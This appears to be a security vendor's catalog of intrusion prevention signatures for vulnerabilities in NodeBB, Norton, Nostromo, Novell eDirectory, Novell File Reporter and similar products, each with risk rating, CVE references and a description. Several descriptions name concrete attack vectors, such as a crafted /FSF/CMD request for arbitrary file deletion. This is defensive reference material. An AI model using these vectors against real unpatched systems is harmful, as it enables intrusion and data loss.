Back to top

NodeBB-Socket.io-Eventname-Denial-Of-Service

About this vulnerability: A vulnerability in NodeBB
Risk: High
First detected in: sgpkg-ips-1643-5242
Last changed: sgpkg-ips-1643-5242
Platform: Generic
Software: NodeBB
Type: Input Validation
Description: A denial of service vulnerability has been reported in NodeBB. The vulnerability is due to insufficient validation of Socket.IO packet event names. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in a denial of service condition.
Situation: File-Text_NodeBB-Socket.io-Eventname-Denial-Of-Service
WebSocket_CS-NodeBB-Socket.io-Eventname-Denial-Of-Service
References:
CVE-2023-30591
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-30591
Back to top

Nodejs-JS-YAML-Load-Code-Execution

About this vulnerability: Node.js js-yaml load() Code Execution
Risk: Moderate
First detected in: sgpkg-ips-570-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Node.js
Type: Javascript Injection
Description: Js-yaml -module of node.js does not handle the unsafe !!js/function tag properly. This may lead to execution of arbitrary javascript code.
Situation: File-Text_Nodejs-JS-YAML-Load-Code-Execution
References:
CVE-2013-4660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4660
BID-60867
http://www.securityfocus.com/bid/60867
OSVDB-94656
http://www.osvdb.org/94656
Back to top

Non-Standard-Port-In-Iframe-Src-Attribute

About this vulnerability: Non-standard port in src attribute of an iframe
Risk: Moderate
First detected in: sgpkg-ips-500-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Generic browser
Type: Malfunction
Description: Hypertext Markup Language (HTML) contains an inline frame feature. This feature can be used to include other pages in the current page. The src attribute is used to define the address (URL) of the embedded page. The page defined in the src attribute is normally retrieved over the default HTTP/HTTPS port (80/443), but any port can be defined in the URL. It is legitimate to use a non-standard port, but malicious, injected iframes are known to use non-standard ports in order to evade detection devices.
Situation: File-Text_Non-Standard-Port-In-Iframe-Src-Attribute
Back to top

nopCommerce-nopCommerce-BackupAction-Directory-Traversal

About this vulnerability: A vulnerability in nopCommerce.
Risk: High
First detected in: sgpkg-ips-1467-5242
Last changed: sgpkg-ips-1467-5242
Platform: Linux; Unix
Software: nopCommerce
Type: Directory Traversal
Description: A vulnerability in nopCommerce, versions prior to 4.50.2, which allows remote attackers to cause a denial of service condition on the target server by sending a crafted request, due to a directory traversal in the BackupAction function.
Situation: HTTP_CS-nopCommerce-nopCommerce-BackupAction-Directory-Traversal
References:
CVE-2022-28451
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28451
Back to top

NorthStar-C2-XSS-To-Agent-RCE

About this vulnerability: An attempt to exploit a vulnerability in NorthStar C2 detected
Risk: High
First detected in: sgpkg-ips-1731-5242
Last changed: sgpkg-ips-1731-5242
Platform: Windows
Software: NorthStar
Type: Input Validation
Description: A vulnerability in NorthStar C2, prior to commit 7674a44, which allows remote attackers to upload and exexute malicious scripts via agent IDs, due to insufficient validation.
Situation: HTTP_CSU-NorthStar-C2-XSS-To-Agent-RCE
References:
CVE-2024-28741
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-28741
Back to top

Norton-AntiVirus-ActiveX-Denial-Of-Service

About this vulnerability: A vulnerability in Norton AntiVirus
Risk: High
First detected in: sgpkg-ips-419-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Symantec Norton AntiVirus
Type: Resource Starvation
Description: There is a denial of service condition within an ActiveX object that is included within Norton Antivirus 2004. An attacker can create a page that instantiates the vulnerable ActiveX object and then creates a denial of service conditionon the victim computer. It has also been reported that arbitrary code can be executed on the remote client if the path of the executable is already known.
Situation: File-Text_Norton-AntiVirus-ActiveX-Denial-Of-Service
References:
CVE-2004-0487
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0487
BID-10392
http://www.securityfocus.com/bid/10392
OSVDB-6303
http://www.osvdb.org/6303
Back to top

Norton-AntiVirus-Decompression-Bomb-Denial-Of-Service

About this vulnerability: A vulnerability in Symantec Mail Security
Risk: Moderate
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Symantec Norton AntiVirus
Type: Malfunction
Description: There is a vulnerability in the way Norton AntiVirus products treat compressed archive files (e.g., zip) that are infected with a virus. During the disinfection of a specially crafted archive containing a known virus, the vulnerable products consume 100% of the CPU, creating a denial of service condition. The vulnerable software consumes 100% of the CPU for a long period until the rebuilding of malicious archive file is finished. On a client system, this will result in a system slowdown. The system is still under protection when opening other resources that are automatically scanned by Norton AntiVirus (e.g. incoming email, file downloads, etc.). Manual scanning cannot be performed by a user until the rebuilding processes is complete, or kill and restart AntiVirus process to perform other manual scanning job. On a system configured with Norton antivirus products for servers, such as mail servers, it significantly slows down one scan thread, multiple attacks could eventually put all available threads in long run period therefore other legitimate connections to the service may be refused. This can stop e-mail delivery, and so on.
Situation: File-Zip_Norton-AntiVirus-Decompression-Bomb-Denial-Of-Service
Back to top

Norton-Internet-Security-2004-Symspam.dll-BOF

About this vulnerability: A vulnerability in Symantec Norton Internet Security
Risk: High
First detected in: sgpkg-ips-370-4219
Last changed: sgpkg-ips-1583-5242
Platform: Windows
Software: Symantec Norton Internet Security
Type: Buffer Overflow
Description: Norton Internet Security 2004 is vulnerable to a buffer overflow attack. If an attacker is able to entice a victim to access a malicious web page or e-mail, it is possible for the attacker to run arbitrary code in the context of LOCAL_SYSTEM. Due to a bounds check failure of the parameter within the vulnerable LaunchCustomRuleWizard() function, if the malicious code is executed (through a browser or e-mail client), a buffer is overrun and will cause the underlying browser or e-mail client to fail. If properly crafted, it is possible for the remote attacker to execute arbitrary code on the remote client, running in the LOCAL_SYSTEM context.
Situation: HTTP_SS-Norton-Internet-Security-2004-Symspam.dll-BOF
References:
CVE-2004-0363
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0363
BID-9916
http://www.securityfocus.com/bid/9916
Back to top

Norton-Internet-Security-NBNS-Response-Processing-Stack-Overflow

About this vulnerability: A vulnerability in Norton Internet Security
Risk: High
First detected in: sgpkg-ips-419-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Symantec Norton Internet Security; Symantec Norton Personal Firewall; Symantec Norton AntiSpam
Type: Buffer Overflow
Description: Symantec Firewall product line is vulnerable to a stack buffer overflow attack in the processing of a specially crafted NetBIOS Name Service Response message. If an attacker is able to send a single UDP datagram with a source port of 137 to a vulnerable host, and the victim allows the incoming UDP datagram, it is possible for the attacker to run arbitrary code with kernel privileges.
Situation: Generic_UDP-Norton-Internet-Security-NBNS-Response-Processing-Stack-Overflow
References:
CVE-2004-0444
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0444
BID-10335
http://www.securityfocus.com/bid/10335
BID-10334
http://www.securityfocus.com/bid/10334
BID-10333
http://www.securityfocus.com/bid/10333
OSVDB-6102
http://www.osvdb.org/6102
OSVDB-6101
http://www.osvdb.org/6101
OSVDB-6099
http://www.osvdb.org/6099
Back to top

Norton-Internet-Security-Remote-Command-Execution

About this vulnerability: A vulnerability in Norton Internet Security
Risk: High
First detected in: sgpkg-ips-416-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Symantec Norton Internet Security
Type: Input Validation
Description: A vulnerability exists in Norton Internet Security products allowing for remote command execution. WrapNISUM, an ActiveX component, can be used in JavaScript and VBScript script to run arbitrary executables on the target via its LaunchURL() method.
Situation: File-Text_Norton-Internet-Security-Remote-Command-Execution
References:
CVE-2004-0364
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0364
BID-9915
http://www.securityfocus.com/bid/9915
Back to top

Nostromo-Directory-Traversal

About this vulnerability: A vulnerability in Nostromo
Risk: High
First detected in: sgpkg-ips-1200-5242
Last changed: sgpkg-ips-1296-5242
Platform: Linux; Unix
Software: Nostromo
Type: Directory Traversal
Description: A vulnerability in Nostromo, versions 1.9.6 and before, which allows remote attackers to execute arbitrary code and retrieve sensitive files via directory traversal.
Situation: HTTP_CSU-Nostromo-Directory-Traversal
References:
CVE-2019-16278
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16278
Back to top

Nostromo-Nhttpd-HTTP_Header_comp-Buffer-Overflow

About this vulnerability: A vulnerability in Nostromo nhttpd
Risk: High
First detected in: sgpkg-ips-1212-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Nostromo
Type: Buffer Overflow
Description: A stack-based buffer overflow vulnerability has been reported in the http_header_comp function of Nostromo nhttpd server. The vulnerability is due to improper boundary checking on part of the application while processing user input. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted HTTP request to the target server. Successful exploitation could result in denial of service conditions and, in the worst case, arbitrary code execution.
Situation: HTTP_CS-Nostromo-Nhttpd-HTTP_Header_comp-Buffer-Overflow
References:
CVE-2019-16279
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16279
Back to top

Novell-Casa-PAM-Module-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Novell CASA
Risk: Moderate
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: Novell CASA
Type: Buffer Overflow
Description: There is a vulnerability in the Common Authentication Service Adapter (CASA) PAM module produced by Novell. The vulnerability can be triggered by providing an overly long user name or password to the module which results in a stack buffer overflow. An attacker may leverage this issue to compromise a vulnerable host system. In an attack case where the malicious user is successful in injecting and executing supplied code, the behaviour of the system is dependent on the nature of the injected code. Any code injected into the vulnerable component would execute in the security context of the current service, which is root by default. If such attack fails, the behaviour depends on the service used in order to carry the attack. However, independent of the service used, the following error message is logged in the system logs: sshd[28836]: fatal: PAM: authentication thread exited unexpectedly In case of an unsuccessful attack over the SSH protocol, the current session will be terminated by the SSH server, however, the service will continue to function.
Situation: SSH_Novell-Casa-PAM-Module-Stack-Buffer-Overflow
References:
CVE-2006-0736
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0736
BID-16779
http://www.securityfocus.com/bid/16779
Back to top

Novell-Client-NetIdentity-Agent-Pointer-Dereference-Code-Execution

About this vulnerability: A code execution vulnerability in Novell Client NetIdentity Agent
Risk: Moderate
First detected in: sgpkg-ips-262-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Novell NetIdentity Agent
Type: Malfunction
Description: There is a code execution vulnerability in the Novell Client NetIdentity Agent. By sending a crafted RPC request to the XTIERRPCPIPE pipe of a vulnerable Novell Client NetIdentity agent, an authenticated attacker can execute arbitrary code with the privileges of the affected service, which is SYSTEM by default.
Situation: SMB-TCP_Novell-Client-NetIdentity-Agent-Pointer-Dereference-Exploit
References:
CVE-2009-1350
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1350
BID-34400
http://www.securityfocus.com/bid/34400
OSVDB-53351
http://www.osvdb.org/53351
Back to top

Novell-Client-Printer-Spooler-Service-Request-Server-Name-Buffer-Overflow

About this vulnerability: A vulnerability in Novell Netware Client
Risk: High
First detected in: sgpkg-ips-466-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Novell Client
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Novell Client for Windows. The vulnerability is due to insufficient validation of server name parameter with specific remote requests. A remote attacker may exploit the vulnerability with a crafted message leading to code execution within the context of the SYSTEM user.
Situation: MSRPC-TCP_Novell-Client-Printer-Spooler-Service-EnumPrinterDrivers-Server-Name
References:
CVE-2007-2954
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2954
BID-25474
http://www.securityfocus.com/bid/25474
OSVDB-37321
http://www.osvdb.org/37321
Back to top

Novell-Client-Printer-Spooler-Service-Server-Name-Buffer-Overflow

About this vulnerability: A vulnerability in Novell Netware Client
Risk: High
First detected in: sgpkg-ips-466-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Novell Client
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Novell Client for Windows. The vulnerability is due to insufficient validation of server name parameter with specific remote requests. A remote attacker may exploit the vulnerability with a crafted message leading to code execution within the context of the SYSTEM user.
Situation: MSRPC-TCP_Novell-Client-Printer-Spooler-Service-EnumPrinters-Server-Name
References:
CVE-2006-5854
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5854
BID-21220
http://www.securityfocus.com/bid/21220
Back to top

Novell-Configuration-Management-Tftpd-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Novell ZENworks Configuration Management
Risk: High
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell ZENworks Configuration Management
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in Novell ZENworks Configuration Management.
Situation: TFTP_CS-Novell-Configuration-Management-Tftpd-Heap-Buffer-Overflow
References:
CVE-2010-4323
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4323
BID-46434
http://www.securityfocus.com/bid/46434
Back to top

Novell-Distributed-Print-Services-Integer-Overflow

About this vulnerability: A vulnerability in Novell Netware
Risk: Moderate
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Novell NetWare
Software: <os>
Type: Input Validation
Description: There is an integer overflow vulnerability in Novell Distributed Print Services module in multiple Novell products. The vulnerability is caused due to lack of proper boundary checks prior to the calculation of the size of a memory buffer. An unauthenticated attacker may exploit this vulnerability to inject and execute arbitrary code in the context of the vulnerable application, Super User in the Netware systems. Successful exploitation of this vulnerability may allow the flow of the process to be diverted to an arbitrary location. In such a case, the behaviour of the target host will be completely dependent on the intention of the injected code. In case of an unsuccessful attack, the Novell Distributed Print Services will terminate, causing a denial of service condition. To restore the functionality, the application or service must be restarted manually.
Situation: Generic_CS-Novell-Distributed-Print-Services-Integer-Overflow
References:
CVE-2006-2327
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2327
BID-17922
http://www.securityfocus.com/bid/17922
OSVDB-25433
http://www.osvdb.org/25433
Back to top

Novell-eDirectory-dhost-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in the handling of HTTP requests loading eDirectory modules in Novell eDirectory
Risk: High
First detected in: sgpkg-ips-262-3038
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: Novell eDirectory
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the handling of HTTP requests loading eDirectory modules in Novell eDirectory. By sending a crafted HTTP request with an excessively long module name, a remote authenticated attacker can leverage this vulnerability to execute arbitrary code on the target host with the privileges of the service process, or to cause a denial of service condition.
Situation: HTTP_CSU-Novell-eDirectory-dhost-Buffer-Overflow
Generic_Novell-eDirectory-dhost-Buffer-Overflow
References:
CVE-2009-4653
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4653
BID-36815
http://www.securityfocus.com/bid/36815
Back to top

Novell-eDirectory-dhost-Httpstk-Buffer-Overflow

About this vulnerability: A vulnerability in Novell eDirectory
Risk: High
First detected in: sgpkg-ips-373-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Novell eDirectory
Type: Buffer Overflow
Description: A code execution vulnerability exists in Novell eDirectory. The vulnerability is due to an error in dhost when handling HTTP requests. A remote, authenticated attacker can exploit this vulnerability by sending a specially crafted HTTP request to a vulnerable system. Successful exploitation would allow for arbitrary code injection and execution with the privileges of the system. Code injection that does not result in execution could terminate the service, resulting in Denial of Service condition.
Situation: Generic_CS-Novell-eDirectory-dhost-Httpstk-Buffer-Overflow
Back to top

Novell-eDirectory-DOS-Device-Name-Denial-Of-Service

About this vulnerability: Denial of service vulnerability in handling of MS-DOS device names in Novell eDirectory
Risk: Moderate
First detected in: sgpkg-ips-66-1210
Last changed: sgpkg-ips-1639-5242
Platform: Generic
Software: Novell eDirectory
Type: Malfunction
Description: The Novell eDirectory web server listens on port 8008 for HTTP requests. On the Windows platform, the product has a vulnerability in the handling of MS-DOS devices if user tries to access these using HTTP requests. In some situations, a request to an MS-DOS device name will cause the server process to terminate.
Situation: HTTP_CSU-Get-Msdos-Device-Name-DoS
References:
CVE-2005-1729
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1729
Back to top

Novell-eDirectory-eMBox-Unauthenticated-File-Access

About this vulnerability: A Novell eDirectory eMBox Unauthenticated File Access vulnerability
Risk: High
First detected in: sgpkg-ips-798-5211
Last changed: sgpkg-ips-1453-5242
Platform: Generic
Software: Novell eDirectory
Type: Insecure Configuration
Description: A vulnerability in Novell eDirectory eMBox, versions 8.7.3.9 and earlier and 8.8.x before 8.8.2, which allows remote attackers to bypass authentication and read arbitrary files via requests for /SOAP URIs.
Situation: File-TextId_Novell-eDirectory-eMBox-Unauthenticated-File-Access
References:
CVE-2008-0926
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0926
BID-28441
http://www.securityfocus.com/bid/28441
OSVDB-43690
http://www.osvdb.org/43690
Back to top

Novell-eDirectory-HTTP-Request-Content-Length-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Novell eDirectory
Risk: High
First detected in: sgpkg-ips-248-3038
Last changed: sgpkg-ips-1584-5242
Platform: Generic
Software: Novell eDirectory
Type: Integer Overflow
Description: There exists a heap buffer overflow vulnerability in Novell eDirectory. The flaw is in the SOAP-HTTP protocol stack due to improper processing of the Content-Length header value. Remote attackers could exploit this vulnerability by sending SOAP-HTTP requests with specially crafted Content-Length value. Successful exploitation would allow for arbitrary code injection and execution with the privileges of the server process. In a sophisticated attack case where code injection is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the affected service. In an attack case where code injection is not successful, the affected service may terminate abnormally.
Situation: HTTP_CSH-Invalid-Negative-Content-Length-Value
References:
CVE-2008-4478
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4478
BID-31553
http://www.securityfocus.com/bid/31553
Back to top

Novell-eDirectory-iMonitor-Cross-Site-Scripting

About this vulnerability: A vulnerability in Novell eDirectory
Risk: Moderate
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell eDirectory
Type: Input Validation
Description: A cross-site scripting vulnerability has been reported in Novell eDirectory IMONITOR. The vulnerability is due to an input validation error while parsing the rdn parameter. A remote attacker could exploit this vulnerability to execute arbitrary script or HTML code in the user's browser session.
Situation: HTTP_CRL-Novell-eDirectory-iMonitor-Cross-Site-Scripting
References:
CVE-2014-5212
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5212
OSVDB-116128
http://www.osvdb.org/116128
Back to top

Novell-eDirectory-iMonitor-NDS-Server-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in Novell eDirectory iMonitor
Risk: High
First detected in: sgpkg-ips-68-1314
Last changed: sgpkg-ips-1589-5242
Platform: Generic
Software: Novell eDirectory
Type: Buffer Overflow
Description: There is a stack based buffer overflow vulnerability in Novell eDirectory iMonitor NDS service. A remote attacker can exploit this vulnerability to execute arbitrary code on the target system via a crafted GET, POST or HEAD request.
References:
CVE-2006-2496
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2496
BID-18026
http://www.securityfocus.com/bid/18026
OSVDB-25781
http://www.osvdb.org/25781
Back to top

Novell-eDirectory-LDAP-Null-Search-Parameter-Buffer-Overflow

About this vulnerability: A vulnerability in Novell eDirectory
Risk: High
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell eDirectory
Type: Buffer Overflow
Description: There exists a heap buffer overflow vulnerability in Novell eDirectory. The flaw is due to incorrect calculation when allocating a heap buffer to store search parameters. An unauthenticated remote attacker could exploit this vulnerability by sending a crafted search request to the system. Successful exploitation would allow for arbitrary code injection and execution with the privileges of the server process, normally System for Windows platforms, or root for Unix platforms. In a simple attack case aimed at creating a denial of service condition, the affected eDirectory service will terminate. If the service is not configured to restart automatically, the service will be unavailable until it is restarted manually. In a sophisticated attack scenario where the malicious user is successful in injecting and executing supplied code, the behaviour of the system is dependent on the nature of the injected code. Any code injected into the vulnerable component would execute in the security context of the service process. On Windows systems, the service is running as System, by default.
Situation: LDAP_CS-Novell-eDirectory-LDAP-Null-Search-Parameter-Buffer-Overflow
LDAP_CS-Novell-eDirectory-LDAP-Null-Search-Parameter-Buffer-Overflow-2
References:
CVE-2008-1809
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1809
BID-30175
http://www.securityfocus.com/bid/30175
Back to top

Novell-eDirectory-NCP-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Novell eDirectory
Risk: High
First detected in: sgpkg-ips-506-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell eDirectory
Type: Buffer Overflow
Description: A stack buffer overflow exists in Novell eDirectory NetWare Core Protocol (NCP) stack. The vulnerability is due to lack of bounds checking in the KeyedObjectLogin function, which is in the ds.dlm file in the Windows distribution. A remote attacker could exploit this vulnerability by sending TCP packets with malicious data. Successful exploitation would result in execution of arbitrary attacker code in the security context of the System user.
Situation: Generic_CS-Novell-eDirectory-NCP-Stack-Buffer-Overflow
Generic_UDP-Novell-eDirectory-NCP-Stack-Buffer-Overflow
References:
CVE-2012-0432
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0432
Back to top

Novell-eDirectory-NDS-Verb-0x01-Integer-Overflow

About this vulnerability: A vulnerability in Novell eDirectory
Risk: High
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell eDirectory
Type: Buffer Overflow
Description: An integer overflow vulnerability exists in Novell eDirectory. The flaw is due to an error processing maliciously crafted service requests (NDS Verb 0x1) containing an overly large integer value. A remote unauthenticated attacker can exploit this vulnerability by sending a malicious request to a target host. Successful exploitation could result in execution of arbitrary code within the security context of the server process, which is System by default. An unsuccessful exploit attempt may terminate the affected application abnormally causing a denial of service condition.
Situation: Generic_CS-Novell-eDirectory-NDS-Verb-0x01-Integer-Overflow
References:
CVE-2009-0895
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0895
BID-37184
http://www.securityfocus.com/bid/37184
Back to top

Novell-eDirectory-Server-Accept-Language-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in Novell eDirectory Server
Risk: High
First detected in: sgpkg-ips-213-2032
Last changed: sgpkg-ips-1396-5242
Platform: Generic
Software: Novell eDirectory
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in Novell eDirectory. The flaw is due to a boundary error when processing HTTP requests. By supplying an overly large number of values for the Accept-Language header, a remote unauthenticated attacker can leverage this vulnerability to inject and execute arbitrary code on the target host with System or root level privileges. An attack targeting this vulnerability can result in the injection and execution of arbitrary code. If code execution is successful, the behaviour of the target will depend on the intention of the attacker. Any injected code will be executed with System or root privileges.
Situation: HTTP_CS-Novell-eDirectory-Server-Accept-Language-Buffer-Overflow
Back to top

Novell-eDirectory-Server-iMonitor-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in Novell eDirectory Server iMonitor
Risk: Moderate
First detected in: sgpkg-ips-36-1210
Last changed: sgpkg-ips-1589-5242
Platform: Windows
Software: Novell eDirectory
Type: Buffer Overflow
Description: Novell eDirectory Server iMonitor has a buffer overflow vulnerability in 'dhost.exe'. A remote attacker can exploit this vulnerability to execute arbitrary code on the victim machine via a crafted GET request.
Situation: HTTP_CSU-Novell-eDirectory-Server-iMonitor-Buffer-Overflow
References:
CVE-2005-2551
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2551
BID-14548
http://www.securityfocus.com/bid/14548
Back to top

Novell-eDirectory-Soap-Handling-Accept-Language-Header-Heap-Overflow

About this vulnerability: A vulnerability in Novell eDirectory
Risk: High
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell eDirectory
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in Novell eDirectory.
Situation: HTTP_CSH-Novell-eDirectory-Soap-Handling-Accept-Language-Header-Heap-Overflow
References:
CVE-2008-4479
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4479
Back to top

Novell-eDirectory-Unchecked-Length-Denial-Of-Service

About this vulnerability: A vulnerability in Novell eDirectory
Risk: Moderate
First detected in: sgpkg-ips-435-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell eDirectory
Type: Malfunction
Description: A denial of service vulnerability exists in the LDAP service of Novell eDirectory. An unchecked user-supplied length value is used during memory allocation while parsing incoming LDAP requests. A remote unauthenticated attacker can exploit this vulnerability by sending a specially crafted packet to the vulnerable server. This can cause the LDAP service to consume an excessive amount of memory, creating a denial of service condition in the LDAP process.
Situation: HTTPS_SS-Novell-eDirectory-Unchecked-Length-Denial-Of-Service
LDAP_CS-Novell-eDirectory-Unchecked-Length-Denial-Of-Service
Back to top

Novell-File-Reporter-Agent-XML-Parsing-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Novell File Management Suite
Risk: Moderate
First detected in: sgpkg-ips-435-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell File Reporter
Type: Buffer Overflow
Description: There is a stack buffer overflow vulnerability in the Agent component of Novell File Reporter. Specifically, the application does not perform a boundary check on the user-supplied data when processing XML &lt;NAME&gt; tag entities. A remote unauthenticated attacker could exploit this vulnerability by sending a maliciously crafted XML &lt;NAME&gt; tag to the Agent service. Successful exploitation would allow the attacker to execute arbitrary code with the privileges of the affect process, which is SYSTEM.
Situation: Generic_CS-Novell-File-Reporter-Agent-XML-Parsing-Stack-Buffer-Overflow
HTTPS_CS-Novell-File-Reporter-Agent-XML-Parsing-Stack-Buffer-Overflow
References:
CVE-2011-0994
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0994
BID-47144
http://www.securityfocus.com/bid/47144
Back to top

Novell-File-Reporter-Arbitrary-File-Delete

About this vulnerability: A Novell File Reporter Arbitrary File Delete vulnerability.
Risk: High
First detected in: sgpkg-ips-715-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell File Reporter
Type: Input Validation
Description: A vulnerability in Novell File Reporter, versions 1.0.4.2 and before, in NFRAgent.exe, which allows remote attackers to delete arbitrary files via a full pathname in an SRS OPERATION 4 CMD 5 request to /FSF/CMD.
Situation: HTTP_CRL-Novell-File-Reporter-Arbitrary-File-Delete
References:
CVE-2011-2750
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2750
OSVDB-73729
http://www.osvdb.org/73729
Back to top

Novell-File-Reporter-Engine-Record-Tag-Parsing-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Novell File Reporter
Risk: High
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell File Reporter
Type: Buffer Overflow
Description: A stack buffer overflow exists in Novell File Reporter Engine. The vulnerability is due to a parsing error when handling attributes within RECORD elements. A remote, unauthenticated attacker can exploit this vulnerability by sending a specially crafted request to the File Reporter Engine. Successful exploitation could result in arbitrary code execution in the SYSTEM context. An unsuccessful exploit attempt may terminate the affected application abnormally, leading to a denial-of-service condition.
Situation: File-Text_Novell-File-Reporter-Engine-Record-Tag-Parsing-Stack-Buffer-Overflow
References:
CVE-2011-2220
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2220
BID-48470
http://www.securityfocus.com/bid/48470
Back to top

Novell-File-Reporter-Engine-Record-Tag-Parsing-Stack-Buffer-Overflow-2

About this vulnerability: A vulnerability in Novell File Reporter
Risk: High
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell File Reporter
Type: Buffer Overflow
Description: A stack buffer overflow vulnerability exists in the Agent component of Novell File Reporter. Specifically, the application does not perform a boundary check on the user-supplied data when processing XML <NAME> tag entities.
Situation: File-Text_Novell-File-Reporter-Engine-Record-Tag-Parsing-Stack-Buffer-Overflow-2
References:
CVE-2011-0994
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0994
BID-47144
http://www.securityfocus.com/bid/47144
Back to top

Novell-File-Reporter-FSFUI-Arbitrary-File-Retrieval

About this vulnerability: A vulnerability in Novell File Reporter
Risk: High
First detected in: sgpkg-ips-494-5211
Last changed: sgpkg-ips-1733-5242
Platform: Generic
Software: Novell File Reporter
Type: Malfunction
Description: A file retrieval vulnerability exists in Novell File Reporter. The vulnerability is caused by insufficient authentication when handling FSFUI requests. An remote unauthenticated attacker could exploit this vulnerability by sending a specially crafted request to the server. Successful exploitation could result in arbitrary file retrieval with SYSTEM privileges.
Situation: File-Text_Novell-File-Reporter-FSFUI-Arbitrary-File-Retrieval
References:
CVE-2012-4958
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4958
BID-56579
http://www.securityfocus.com/bid/56579
OSVDB-87573
http://www.osvdb.org/87573
Back to top

Novell-File-Reporter-FSFUI-Record-Directory-Traversal

About this vulnerability: A Novell File Reporter FSFUI Record Directory Traversal vulnerability
Risk: High
First detected in: sgpkg-ips-782-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell File Reporter
Type: Directory Traversal
Description: A vulnerability in Novell File Reporter, version 1.0.2, which allows remote attackers to upload and execute files via a directory traversal while handling requests to /FSF/CMD with FSFUI records with UICMD 130.
Situation: HTTP_CRL-Novell-File-Reporter-FSFUI-Record-Directory-Traversal
References:
CVE-2012-4959
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4959
OSVDB-87573
http://www.osvdb.org/87573
Back to top

Novell-File-Reporter-SRS-Arbitrary-File-Retrieval

About this vulnerability: A vulnerability in Novell File Reporter
Risk: High
First detected in: sgpkg-ips-499-5211
Last changed: sgpkg-ips-1733-5242
Platform: Generic
Software: Novell File Reporter
Type: Malfunction
